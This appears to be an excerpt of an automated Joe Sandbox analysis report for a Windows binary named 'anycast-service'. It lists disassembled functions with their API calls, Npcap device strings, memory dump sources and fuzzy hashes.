826->833 828->829 836 7ff8b8013d41-7ff8b8013d4f GetProcessHeap HeapFree 829->836 837 7ff8b8013d55-7ff8b8013d57 829->837 831->819 832->813 852 7ff8b8013c6d-7ff8b8013c7f 833->852 853 7ff8b8013c9f-7ff8b8013cb4 833->853 834->806 834->831 835->813 835->834 836->837 841 7ff8b8013d59-7ff8b8013d63 SetLastError 837->841 842 7ff8b8013d65 837->842 838->811 843 7ff8b8013b62-7ff8b8013b6c 839->843 845 7ff8b8013d68 841->845 842->845 846 7ff8b8013b6e-7ff8b8013b74 843->846 847 7ff8b8013b81-7ff8b8013ba2 843->847 845->794 846->847 849 7ff8b8013b76-7ff8b8013b7f 846->849 847->819 858 7ff8b8013ba8-7ff8b8013bb2 847->858 849->843 849->847 854 7ff8b8013c9a call 7ff8b801666c 852->854 855 7ff8b8013c81-7ff8b8013c94 852->855 856 7ff8b8013ce5-7ff8b8013cf3 call 7ff8b8013240 853->856 857 7ff8b8013cb6-7ff8b8013ccb call 7ff8b80128a0 853->857 854->853 855->854 859 7ff8b8013d9c-7ff8b8013db3 call 7ff8b801dff8 855->859 856->819 873 7ff8b8013cf5-7ff8b8013cfb GetLastError 856->873 857->856 871 7ff8b8013ccd-7ff8b8013cdb call 7ff8b8013240 857->871 863 7ff8b8013bc3-7ff8b8013bc5 858->863 864 7ff8b8013bb4-7ff8b8013bc1 858->864 875 7ff8b8013e11 859->875 876 7ff8b8013db5-7ff8b8013dc6 859->876 863->831 865 7ff8b8013bcb-7ff8b8013be2 SetEvent CloseHandle * 2 863->865 870 7ff8b8013be8-7ff8b8013c01 GetProcessHeap HeapFree 864->870 865->870 870->819 871->819 882 7ff8b8013cdd-7ff8b8013ce3 GetLastError 871->882 873->819 877 7ff8b8013dc8-7ff8b8013dd5 876->877 878 7ff8b8013dd7-7ff8b8013dd9 876->878 884 7ff8b8013df8-7ff8b8013e06 GetProcessHeap HeapFree 877->884 880 7ff8b8013ddb-7ff8b8013df2 SetEvent CloseHandle * 2 878->880 881 7ff8b8013e0c-7ff8b8013e10 878->881 880->884 881->875 882->856 884->881
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$Process$Free$CloseErrorHandleLast$AllocEventMutexObjectReleaseSingleWait$_invalid_parameter_noinfo_noreturn
                                                                                                                              • String ID: %ws$\Device\NPCAP\$\Device\NPCAP\WIFI_
                                                                                                                              • API String ID: 3156133948-4200895002
                                                                                                                              • Opcode ID: 6a4ea7150212ad65beca186ca1dd65eda030c03e76e168ca0f40c2ff4e1fc794
                                                                                                                              • Instruction ID: 8c1ab65c8bae63f7c28c9d185ed3cf5bbb901376d91542073d2289ee852c555d
                                                                                                                              • Opcode Fuzzy Hash: 6a4ea7150212ad65beca186ca1dd65eda030c03e76e168ca0f40c2ff4e1fc794
                                                                                                                              • Instruction Fuzzy Hash: 54D14E21A09A43C1FF51AB5AA8482BA63A1BF49BE4F454435EF1E473D5DF3CE4478318
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F8878C Relevance: 51.1, APIs: 3, Strings: 26, Instructions: 323COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Name::operator+
                                                                                                                              • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $bool$char$char16_t$char32_t$char8_t$const$double$float$int$long$long $short$signed $unsigned $void$volatile$wchar_t
                                                                                                                              • API String ID: 2943138195-1201493255
                                                                                                                              • Opcode ID: e9db086cb9278bd4d3952e0924e23527b4f07c5628be6c95e7d75c149b947276
                                                                                                                              • Instruction ID: 7a3cef4844334118905ca34c10a24b6ec28360d25cd79cc1f7d3c44578259515
                                                                                                                              • Opcode Fuzzy Hash: e9db086cb9278bd4d3952e0924e23527b4f07c5628be6c95e7d75c149b947276
                                                                                                                              • Instruction Fuzzy Hash: 94F13A71E38A12D8FB108B68D880ABC27B0BB457CAF504536DB1D9679ADF3CE546C349
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8011630 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 117memorysynchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$CloseHandleMutexRelease$Process$EventFree$AllocObjectSingleWait_invalid_parameter_noinfo
                                                                                                                              • String ID: Adapter for loopback traffic capture$\Device\NPCAP\Loopback
                                                                                                                              • API String ID: 526253520-3706271436
                                                                                                                              • Opcode ID: b9170983c726d4b54d24ade4a8990895e3f062e65161bf73a20c5d237bc726a2
                                                                                                                              • Instruction ID: 40b21e6f1cb7efe175362d943e7a0305d470c1713b108ca016e5cf58b8058e8d
                                                                                                                              • Opcode Fuzzy Hash: b9170983c726d4b54d24ade4a8990895e3f062e65161bf73a20c5d237bc726a2
                                                                                                                              • Instruction Fuzzy Hash: 39510835A48A4286EF459B6BE8442B96361FF8DBE4F445131EB2E433E4DF3CA4478308
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8015540 Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 101memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$ErrorLastProcess$Free$Alloc
                                                                                                                              • String ID: #$$h!$\Device\NPCAP\WIFI_
                                                                                                                              • API String ID: 1358222221-293540800
                                                                                                                              • Opcode ID: 1923a735dd6753a3bff1de7622ade4980f61a933d88750920fbd019a492c77c4
                                                                                                                              • Instruction ID: cfeb6bcd38b895cac08a0e0f60670be22e790237da4c32f7f44e41206e1e6d7e
                                                                                                                              • Opcode Fuzzy Hash: 1923a735dd6753a3bff1de7622ade4980f61a933d88750920fbd019a492c77c4
                                                                                                                              • Instruction Fuzzy Hash: D5414031A08B42C6EF109B2AE45426A73A0FB8CBD0F404136EB8E477A5DF3CE44B8744
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F8BA30 Relevance: 28.3, APIs: 15, Strings: 1, Instructions: 288COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Name::operator+
                                                                                                                              • String ID: `anonymous namespace'
                                                                                                                              • API String ID: 2943138195-3062148218
                                                                                                                              • Opcode ID: cd0117eb55822324b98ddf34b6ef2ea53442027725ef2e75c50381bcbe8170c3
                                                                                                                              • Instruction ID: a3ab38abfe0659aa2d1381758e0c0a657ed6f01f10cd5627e30e3bd21d0eabce
                                                                                                                              • Opcode Fuzzy Hash: cd0117eb55822324b98ddf34b6ef2ea53442027725ef2e75c50381bcbe8170c3
                                                                                                                              • Instruction Fuzzy Hash: 08E17972A18B82DAEB10CF68E4809E977A0FB547C9F408036EB4D57B5ADF38E556C704
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8011B10 Relevance: 28.2, APIs: 15, Strings: 1, Instructions: 174memorysynchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$Process$Free$Alloc$AdaptersAddressesMutexObjectReleaseSingleWait_invalid_parameter_noinfo
                                                                                                                              • String ID: \Device\NPCAP\Loopback
                                                                                                                              • API String ID: 4032166684-803390907
                                                                                                                              • Opcode ID: 1184e033e98e0d851ba9bb42ce57a1c5b6807c0adf3820f03fd5a2f2bd9e6b7d
                                                                                                                              • Instruction ID: 432b9209d65a98d04511ab915751a5bc7e5be70e2b36368fb84fc7a6af202e55
                                                                                                                              • Opcode Fuzzy Hash: 1184e033e98e0d851ba9bb42ce57a1c5b6807c0adf3820f03fd5a2f2bd9e6b7d
                                                                                                                              • Instruction Fuzzy Hash: 7A712C21A08A4285EF59AB5BA5442BAA3A1BF8DBE0F085435EF0D477D5DF3CE4038348
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8015070 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 148memorysynchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 00007FF8B80128A0: GetProcessHeap.KERNEL32 ref: 00007FF8B80128F5
                                                                                                                                • Part of subcall function 00007FF8B80128A0: HeapAlloc.KERNEL32 ref: 00007FF8B8012909
                                                                                                                                • Part of subcall function 00007FF8B80128A0: GetProcessHeap.KERNEL32 ref: 00007FF8B801293E
                                                                                                                                • Part of subcall function 00007FF8B80128A0: HeapFree.KERNEL32 ref: 00007FF8B801294C
                                                                                                                              • GetLastError.KERNEL32 ref: 00007FF8B80150D3
                                                                                                                              • GetProcessHeap.KERNEL32 ref: 00007FF8B80150E0
                                                                                                                              • HeapFree.KERNEL32 ref: 00007FF8B80150EE
                                                                                                                              • GetProcessHeap.KERNEL32 ref: 00007FF8B80150F9
                                                                                                                              • HeapFree.KERNEL32 ref: 00007FF8B8015107
                                                                                                                              • SetLastError.KERNEL32 ref: 00007FF8B801510F
                                                                                                                                • Part of subcall function 00007FF8B8012F70: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,00007FF8B801315F), ref: 00007FF8B8012F93
                                                                                                                                • Part of subcall function 00007FF8B8012F70: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,00007FF8B801315F), ref: 00007FF8B8012FA4
                                                                                                                                • Part of subcall function 00007FF8B8012F70: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF8B801315F), ref: 00007FF8B8012FED
                                                                                                                              • WaitForSingleObject.KERNEL32 ref: 00007FF8B8015128
                                                                                                                              • ReleaseMutex.KERNEL32 ref: 00007FF8B8015177
                                                                                                                              • GetProcessHeap.KERNEL32 ref: 00007FF8B8015182
                                                                                                                              • HeapFree.KERNEL32 ref: 00007FF8B8015190
                                                                                                                              • GetProcessHeap.KERNEL32 ref: 00007FF8B801519B
                                                                                                                              • HeapFree.KERNEL32 ref: 00007FF8B80151A9
                                                                                                                              • SetLastError.KERNEL32 ref: 00007FF8B80151B2
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011DC4
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011DF9
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011E07
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011E15
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011E23
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011E46
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011E57
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: GetAdaptersAddresses.IPHLPAPI ref: 00007FF8B8011E8A
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011E99
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: HeapReAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011EAD
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011F04
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011F12
                                                                                                                                • Part of subcall function 00007FF8B8011DA0: ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,00007FF8B8011D3D), ref: 00007FF8B8011F3D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$Process$Free$Alloc$ErrorLast$MutexObjectReleaseSingleWait$AdaptersAddressesByteCharMultiWide
                                                                                                                              • String ID: \Device\NPCAP\
                                                                                                                              • API String ID: 2282102433-514527325
                                                                                                                              • Opcode ID: 71f8c21f1f20e9ee1f63b41e598ccf045e962250b9aaf47cccdf230b635288e9
                                                                                                                              • Instruction ID: 94b0e286bd6dcceb07c06f90706377ea9efa6c702a6d040854d7910d6162c528
                                                                                                                              • Opcode Fuzzy Hash: 71f8c21f1f20e9ee1f63b41e598ccf045e962250b9aaf47cccdf230b635288e9
                                                                                                                              • Instruction Fuzzy Hash: 01515021B09B8285EF459B6EA5042B963A1BF99BD4F189135EF4D07792EF38E0878304
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8014380 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 108memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$ErrorLastProcess$AllocByteCharFreeFullMultiNamePathWide
                                                                                                                              • String ID: (h!
                                                                                                                              • API String ID: 3538023048-676478907
                                                                                                                              • Opcode ID: a74b4a7bc39186acbd88adaafb2a4d11005e1dbcb944466e6061fdd501f39feb
                                                                                                                              • Instruction ID: 917027b92a748bfbb000f8074076d790ef8245e0af48bcd28e7a9c68d5b1d5af
                                                                                                                              • Opcode Fuzzy Hash: a74b4a7bc39186acbd88adaafb2a4d11005e1dbcb944466e6061fdd501f39feb
                                                                                                                              • Instruction Fuzzy Hash: C341A42290CB8186EF209B1AA4443AA6791FB4D7E4F444235EB9D437E5CF3CE04B8744
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F8C7F0 Relevance: 23.1, APIs: 9, Strings: 4, Instructions: 331COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Name::operator+$NameName::
                                                                                                                              • String ID: NULL$`generic-class-parameter-$`generic-method-parameter-$`template-type-parameter-
                                                                                                                              • API String ID: 168861036-4167119577
                                                                                                                              • Opcode ID: 210ff92e75955f2bf36e536a6845f7e4fce72e228a6c7b03dfd29f86a95e795e
                                                                                                                              • Instruction ID: 526b3f8bfbcb7808708c818117e99a42796dc8ca6299119d9636202377f82546
                                                                                                                              • Opcode Fuzzy Hash: 210ff92e75955f2bf36e536a6845f7e4fce72e228a6c7b03dfd29f86a95e795e
                                                                                                                              • Instruction Fuzzy Hash: DAE19932F08A82C9FB609B68E454ABC2761AB547CAF410136DB4D577D6DF3CE50AC388
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F8A238 Relevance: 22.9, APIs: 15, Instructions: 358COMMONLIBRARYCODE
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F95000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147355274.00007FF8B8F97000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8f80000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Name::operator+
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2943138195-0
                                                                                                                              • Opcode ID: 97f32450331f06871e3634a33a5809a5b647533255c7ad3f64e7b6b7d0c655ef
                                                                                                                              • Instruction ID: 034cc8742ec450eb49a946661e4cf8d64467ad5f352e5cb16c0cae6d213cae3b
                                                                                                                              • Opcode Fuzzy Hash: 97f32450331f06871e3634a33a5809a5b647533255c7ad3f64e7b6b7d0c655ef
                                                                                                                              • Instruction Fuzzy Hash: 68F17972A18A82DAEB10DBA8D4905EC37B0EB4478DF444132EB4D57B9ADF38D556C348
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B80126D0 Relevance: 21.1, APIs: 8, Strings: 6, Instructions: 128memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$Process$AllocFree
                                                                                                                              • String ID: N$N$NPCA$NPCA$NPCA$P\
                                                                                                                              • API String ID: 756756679-3199931090
                                                                                                                              • Opcode ID: 3ef62085b394fc63b513bb01c4708e1ab771ebfbeaed1268d348c25eebb50d93
                                                                                                                              • Instruction ID: 6272f043135cf3b05dd2c99a06a95d24fd9b789c7ea1ccc4fff78c87ad7c159b
                                                                                                                              • Opcode Fuzzy Hash: 3ef62085b394fc63b513bb01c4708e1ab771ebfbeaed1268d348c25eebb50d93
                                                                                                                              • Instruction Fuzzy Hash: 19416D65B09786C5EE15EB6AA90416B6691BF49FE4F188031EF0D07BC5DF3CE4478308
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8011DA0 Relevance: 19.6, APIs: 13, Instructions: 108memorysynchronizationCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144047838.00007FF8B8011000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B8010000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2142182098.00007FF8B8010000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144243016.00007FF8B8031000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144277304.00007FF8B803E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144336012.00007FF8B8041000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_34_2_7ff8b8010000_anycast-service.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Heap$Process$Free$Alloc$AdaptersAddressesMutexObjectReleaseSingleWait
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 457050678-0
                                                                                                                              • Opcode ID: b183807c0ab3fd56cc59fe16f2aca5b40131682a04375450492b31f8395677f5
                                                                                                                              • Instruction ID: 6f2736744617b0c98d2fa9f55ebabfda79c57a6a779b7db969594c73a3a840c0
                                                                                                                              • Opcode Fuzzy Hash: b183807c0ab3fd56cc59fe16f2aca5b40131682a04375450492b31f8395677f5
                                                                                                                              • Instruction Fuzzy Hash: C5416525A58B42C6EF559B9BA54426AA3A1BF4DBE0F485435EF4D03BD4DF3CE4038708
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 00007FF8B8F82A30 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 319COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000022.00000002.2144436344.00007FF8B8F81000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FF8B8F80000, based on PE: true
                                                                                                                              • Associated: 00000022.00000002.2144384652.00007FF8B8F80000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2144475077.00007FF8B8F90000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                              • Associated: 00000022.00000002.2147309599.00007FF8B8F94000.00000004.00000001.01000000.00000010.sdmpDownload File
